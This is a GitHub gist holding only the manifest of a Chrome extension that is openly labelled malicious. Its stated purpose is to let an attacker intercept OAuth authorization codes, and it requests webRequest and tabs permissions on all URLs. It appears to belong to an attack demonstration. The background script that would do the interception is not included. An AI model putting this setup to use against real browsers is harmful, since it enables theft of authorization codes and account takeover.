Created
January 6, 2024 04:48
-
-
Save DavidKlempfner/8cf43835a9a812481585470bce98fb9f to your computer and use it in GitHub Desktop.
MaliciousChromeExtensionManifest
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{ | |
"manifest_version": 3, | |
"name": "Victims Extension", | |
"description": "Allows an attacker to intercept the authorization code", | |
"version": "1.0", | |
"background": { | |
"service_worker": "background.js" | |
}, | |
"host_permissions": [ | |
"<all_urls>" | |
], | |
"permissions": [ | |
"webRequest", | |
"tabs" | |
] | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment